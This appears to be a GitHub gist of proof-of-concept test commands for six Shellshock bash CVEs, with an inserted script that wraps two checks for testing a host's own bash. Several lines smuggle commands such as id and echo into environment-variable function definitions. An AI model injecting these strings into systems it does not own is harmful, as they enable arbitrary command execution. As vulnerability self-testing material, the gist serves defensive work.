@sgviking
Last active October 29, 2020 11:05
PoC for 6 Shellshock CVEs

shellshock PoC/test code

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

# will create a file named echo in cwd with date in it, if vulnerable
env X='() { (a)=>\' bash -c "echo date"; cat echo
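
The two checks above, wrapped so they can be scripted against a host's own bash, as an added example that is not part of the original gist: the CVE-2014-7169 test runs in a throwaway directory and looks for the `echo` file directly instead of relying on `cat echo` failing. The function names, the `SHELLSHOCK_MARKER` string and the optional interpreter-path argument are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the gist: scriptable wrappers around the
# CVE-2014-6271 and CVE-2014-7169 checks. Function names, the marker string
# and the optional interpreter argument are assumptions of this example.

# Resolve a bare name through PATH; pass an absolute path to test a
# specific binary (check_7169 changes directory before running it).
resolve_bash() {
    command -v "${1:-bash}" 2>/dev/null
}

# CVE-2014-6271: a vulnerable bash runs the text that trails the function
# body while importing X. Only a harmless marker is echoed here.
check_6271() (
    bash_bin=$(resolve_bash "${1:-}") || { echo "bash not found"; exit 2; }
    out=$(env X='() { :; }; echo SHELLSHOCK_MARKER' "$bash_bin" -c true 2>/dev/null) || true
    case $out in
        *SHELLSHOCK_MARKER*) echo "vulnerable" ;;
        *) echo "not vulnerable" ;;
    esac
)

# CVE-2014-7169: a vulnerable bash writes a file named "echo" into the cwd.
# Work in a temporary directory so nothing is left behind in the caller's
# directory, and test for the file rather than parsing error output.
check_7169() (
    bash_bin=$(resolve_bash "${1:-}") || { echo "bash not found"; exit 2; }
    tmp=$(mktemp -d) || exit 2
    cd "$tmp" || exit 2
    env X='() { (a)=>\' "$bash_bin" -c "echo date" >/dev/null 2>&1 || true
    if [ -e echo ]; then result="vulnerable"; else result="not vulnerable"; fi
    cd / && rm -rf "$tmp"
    echo "$result"
)

# Report for the bash found on PATH.
for t in check_6271 check_7169; do
    printf '%s: %s\n' "$t" "$($t)"
done
```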

CVE-2014-7186

Taken from http://en.m.wikipedia.org/wiki/Shellshock_(software_bug)#CVE-2014-7186

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

Taken from http://en.m.wikipedia.org/wiki/Shellshock_(software_bug)#CVE-2014-7187

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6277

Taken from @mubix https://github.com/mubix/shellshocker-pocs

will segfault if vulnerable

() { x() { _; }; x() { _; } <<a; }

Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9

CVE-2014-6278

Taken from @mubix https://github.com/mubix/shellshocker-pocs

() { _; } >_[$($())] { echo hi mom; id; }
